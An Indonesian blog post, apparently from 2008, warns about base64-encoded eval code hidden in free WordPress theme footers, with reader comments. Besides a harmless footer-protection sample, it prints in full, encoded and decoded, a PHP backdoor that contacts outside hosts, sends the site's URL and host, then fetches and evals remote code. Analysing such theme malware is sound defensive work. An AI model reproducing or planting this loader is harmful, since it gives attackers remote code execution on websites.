« Suasana Hati
WP 2.5 »

Eval di Theme

Nemu kode ini di file footer.php pada theme wordpress yang baru saja saya download.

PLAIN TEXT
PHP:
  1. <?
  3. bZC9bsMwDITnFOg7XD21g+PdVWSgS7t1CZCxkCLa
  4. EixLqqTECNCHrxX3ZwkXHu7IDyA7zh7qGpIG49B7
  5. nymirvn93WbDGmXOq+qCDhgofySjSIr4+PSMrkR/
  6. M0UvEkbtqhVTFRtggUNRMoMjBXlpwQR0pH5X6ZxD
  7. 2zTzPG8nMdLnyRzH7dFPFX931jjCgWQymfByMlZR
  8. ZI3gEE7dRswktU/ZuGEgGtMKWgh4W12U9dcS4Qvi
  9. LIwV0hL6SASRW+x9uIXNPswha5roB4mDjypESgn7
  10. q124rAnLtVjq9yH/XXp1uQqdJ8tZ9w0=
  11. '))); ?>


Sebenarnya ngga ada masalah di kode tersebut. Jadinya kira-kira begini ketika eval diubah jadi echo :

PLAIN TEXT
CODE:
  1. ?><!-- begin footer -->
  2.         </div>
  3.         <?php get_sidebar(); ?>
  4.     </div>
  5.     <div id="footer">
  6.       <p> designed by: <a href="http://www.makequick.com">Online Website Builder</a> and: <a href="http://www.webhostinggeeks.com">Web Hosting </a>Geeks | available free at: Top<a href="http://www.topwpthemes.com"> Wordpress Themes</a></p>
  7.     </div>
  8. </div>
  9. </body>
  10. </html><?

Tapi apa jadinya ya kalau ada kode ini :

PLAIN TEXT
PHP:
  1. <?
  2. @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
  3. jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
  4. LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
  5. gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
  6. SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
  7. iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
  8. kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
  9. QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
  10. M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
  11. EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
  12. BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
  13. sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
  14. cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
  15. M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
  16. JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
  17. RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
  18. ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
  19. NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
  20. A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
  21. kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
  22. hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
  23. kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
  24. U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
  25. I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
  26. gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
  27. M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
  28. BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
  29. U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
  30. JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
  31. 9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
  32. ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
  33. E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
  34. MzMDkxNik7?));
  35. ?>

Pipis aja ngga boleh sembarangan, apalagi download theme yah. Dah ah. * mburuh kerja lagi *

** kode ketiga dan kampanye "jangan download theme sembarangan" ada disini.

Update : Kode diatas jadinya seperti ini :

PLAIN TEXT
PHP:
  1. <?php
  2. if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2"; @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1"$R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST'])$R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);  @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0"$R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } fclose($R37C014DAE5FE4FE5C77B6735ABC30916);
  3. ?>

Semoga sandalilang sama pangsit puas.

This entry was posted on Thursday, March 6th, 2008 at 5:35 pm and is filed under PHP. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

13 Responses to “Eval di Theme”

  1. sandal Says:
    March 8th, 2008 at 3:52 am

    ga kebaca itu isinya apaan T_T

  2. funkshit Says:
    March 8th, 2008 at 4:22 am

    nganu kang.. parse error je
    itu isinya apa ?

  3. pengki Says:
    March 8th, 2008 at 12:07 pm

    @sandal sama pangsit
    tuh udah di update sama isi aslinya. :P
    kalau error, ya maap. tanda ' berubah jadi ’ je. hehe..

  4. daniel Says:
    March 9th, 2008 at 4:45 am

    Wah kode berbahaya yah saya sempet lihat topik tersebut di id.forum.wordpress.org By The Way mas saya ada tag untuk mas tolong di cek yah trims :)

  5. Effendi Says:
    March 10th, 2008 at 4:27 am

    *udah ndak donlot lagi beberapa waktu ini*

  6. starboard Says:
    March 10th, 2008 at 4:40 am

    waduh :(

  7. quelopi Says:
    March 10th, 2008 at 7:55 am

    nah itu dia, saya juga pernah menemukannya, dan sempat bingung cara ngedit nya.. sebenar nya itu jenis pemrograman apa yah?

  8. pengki Says:
    March 10th, 2008 at 2:11 pm

    @quelopi
    itu masih php. cuma di encode (encode sama dengan enkrip ngga sih ? :D ) ke base64 . terus hasil encode di-decode di file-file nya wordpress.

    @daniel
    berbahaya ? tergantung kodenya juga. kalau dari contoh yang 1, ngga berbahaya. kayaknya sih si penyedia link download ngga mau footer nya diubah-ubah.

    makasih tag nya. kalau sempat akan saya kerjakan. :)

  9. detnot Says:
    March 11th, 2008 at 3:54 am

    puyeng jeng
    gk ngarti :(

  10. @del Says:
    March 11th, 2008 at 7:16 am

    Saya punya loh script untuk mengdecodenya :) kemaren dapet di php.net. URI bscore.net/programming/decodeing-fungsi-eval/

  11. Adhi Yudho Says:
    March 11th, 2008 at 11:22 pm

    wah.. makanya, dulu pernah coba donlot free WP Themes, di footernya ada tulisan kek gitu.. >_<

    untung cuma buat belajar themesnya waktu itu :D

    txs bro agung :)

  12. -tikabanget- Says:
    March 12th, 2008 at 5:17 pm

    :| opo kuwi peng..

  13. arvernester Says:
    March 14th, 2008 at 2:51 am

    ga ngerti sayah. . .

Leave a Reply